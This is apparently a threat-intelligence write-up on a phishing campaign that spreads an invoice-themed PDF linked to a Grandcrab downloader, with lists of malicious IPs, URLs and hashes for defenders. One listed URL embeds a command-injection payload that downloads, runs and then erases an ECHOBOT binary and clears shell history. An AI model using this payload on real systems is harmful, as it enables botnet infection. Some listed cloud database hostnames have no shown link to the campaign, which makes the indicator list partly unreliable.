An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: “Mill Taste”) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an “Accounting Manager” by the name of “Melissa Henry” who is sending a “copy” of a paid invoice. In fact, it has attached a PDF and is coming with the subject line: Paid Invoice TT Copy. Based on my link analysis the PDF is infected with malware which will be described below.
Phishing Campaign Cyber Observables
The phishing domain is: elmolinosabor[.]com
The phishing IP is: 146.112.61[.]107
Recent DNS History
The threat actor appears to have begun building his infrastructure on February 1, 2019 using an admin panel labeled “l5fa7189.justinstalledpanel.com” at IP: 94.102.60.165. From the DNS history tracked by [redacted] it appears that the initial test run of the malicious infrastructure was on June 5th and 8th from www1-royalbank[.]cc and www1royalbank-petrocanada[.]com, respectively.
The same Splash page for all three of these events is showing as the same ‘Welcome!’ placeholder.
According to the [redacted] tool the autonomous system network for the above noted IP is: AS202425 which is exhibiting multiple security issues including:
- Route leaks (4)
- Hijacks (111)
- DDoS Amplifiers (326)
- Static Loops (5)
Malware Artifacts
The most recently seen malware artifact as documented on [redacted] was the following WIN32 executable: scaalqtw[.]exe (Hash: 533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9).As of August 15, 2019, 51 of 70 antivirus research firms have identified this malware as malicious including CheckPoint, CrowdStrike, FireEye, F-Secure, Kaspersky, Malwarebytes, McAfee, Microsoft, Panda, Palo Alto Networks, Sophos, TrendMicro, and Symantec. It is being characterized as a “heuristic” “downloader” and a “Grandcrab.AF” Trojan.
As the viewer can see from the above screenshot the executable file is beaconing out to a Seychelles site and a .zz site (the question mark [?]) shown on the node graph representation. There are numerous “communicating” and referring nodes also associated with the .zz node identified by [redacted] as Hanover Hospital. The Cyber Observables for this campaign are given below.
Contact CTIN for more information and the complete list of Cyber Observables of the Mill Taste Campaign.
Dropper Site Cyber Observables
533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9,
94.102.60.165,
10.0.2.15,
http://94.102.60.165/log/adm.php,
http://94.102.60.165/check.dll,
http://94.102.60.165/mail.dll,
http://94.102.60.165/sun/check.dll,
http://94.102.60.165/sea/indexh.php?&1001=2&99=15&f1=ssleay32.dll,
http://94.102.60.165/sun/indexh.php?&1001=2&99=15&f1=ssleay32.dll,
http://94.102.60.165/sun/indexh.php?&1001=2&99=15&f1=libeay32.dll,
http://10.0.2.15:1041%s/,
http://94.102.60.165/sun/indexh.php?&1001=2&99=0&f1=7z.dll,
http://94.102.60.165/sun/indexh.php?&1001=2,
http://94.102.60.165/sea/indexh.php?&1001=4&req=3&
Communicating Nodes Cyber Observables
12c7e0c472a50b29530a0417659d758079d7cfa9557ea224d95ea92745cb0ac3,
5f4ec26b34a5dcb26590128a6c99b8391f00cb7fcba301a25291b33bf27b65b3,
d691b01806cc91407f560e4a1ee2bad5d817cab98989f7e7353dc8c0e1239c48,
a1510186f29e0c0b5e0c01a986ecb4e16938be0fba3c2f19d81374f4130317cf,
2e14332b9b4c8c1b36dbd6515ac7e5212d0e634792415feeb8eb25134b09ca0d,
adb17860802b2a9e5dd10e603b4034142ee35a00474f7a13b6474f24be880510,
723d9a74f82c1eeae07e4ce8bb2580b8b60673311d04384284809f96e5cb2d6e,
1e12793127168b505dac74e0ba56e268afaf8f9cc819c70e09bd84583a7fdd6f,
cdac6989937bd374e5a4c7e58a91f68c0bb409c1d58034a5c8670144bde6d762,
7fe7a59e34d6c190309219d69fe11900daec7d82e0f6de36716d5068806fc814,
w1-runnerscaleoutcitusgroup637078724425217418.postgres.database.azure.com,
runnercitus-eastus-348e85ea-4.postgres.database.azure.com,
w0-runnerscaleoutcitusgroup637078580419087604.postgres.database.azure.com,
runnercitus-eastus-1be96d43-3.postgres.database.azure.com,
w1-runnerscaleoutcitusgroup637078436412997021.postgres.database.azure.com,
pantos-msk.d4honm.c2.kafka.ap-northeast-2.amazonaws.com,
runnercitus-eastus-d6febfab-2.postgres.database.azure.com,
w1-runnerscaleoutcitusgroup637078292406906669.postgres.database.azure.com,
cfnlaunchpadcanarytes.ydze9e.c4.kafka.eu-north-1.amazonaws.com,
w0-runnerscaleoutcitusgroup637078148400702433.postgres.database.azure.com,
http://10.0.2.15/bot/config.bin,
http://10.0.2.15:1037/click/dtype=stred/pid=12/cid=72435/path=%25s/*,
http://yuemahui.f3322.org/,
http://10.0.2.15/repository/annotate?rev=cd /tmp; wget http://31.13.195.251/ECHO/ECHOBOT.x86; chmod 777 ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86; history -c,
http://gxga.3322.org/,
http://jjteng.3322.org/,
http://chenyunfei.3322.org/,
https://yuemahui.f3322.org/,
https://populire.servecounterstrike.com/,
http://populire.servecounterstrike.com/,
7d7c9c2deb475c3e7c77f5b9fff03dc6bddced25115232b68112acfead57c2a1,
0439751586a1856bc8feb48535c4055f51835b679e386d083a2c98d47181218f,
b2a9f53b52998f213675a332df13f0e66800277dde678c42c446f18bd6424798,
37269f57bad0f2d954f2aa2892b89bbad10278e84e035b4a4db78f1c6a408d8e,
47a309f76a12f39d77f155f5e548ac10126db993c1f619c6810ca71793f77734,
de9d727e15ea3ddbe9eb3a49ae083e5cca23f9fbf8cdd5d76021e3cea37cb2af,
5d393cdd0d4c8813f9c86121d6279d85232316bbe993ea1fb6f8f4471efb5d8a,
6ab990ea783a1e28783b79d123525d434f93b7214014d0cd8071889f82108562,
dda022507ffdcb2eb82534a3224f0862eb76faaacedc91b3fb1b06fcfc35c10c,
7c99c2bd71448f2bb930772c4acfeb534472817d9e1493059eebea66b493fcb7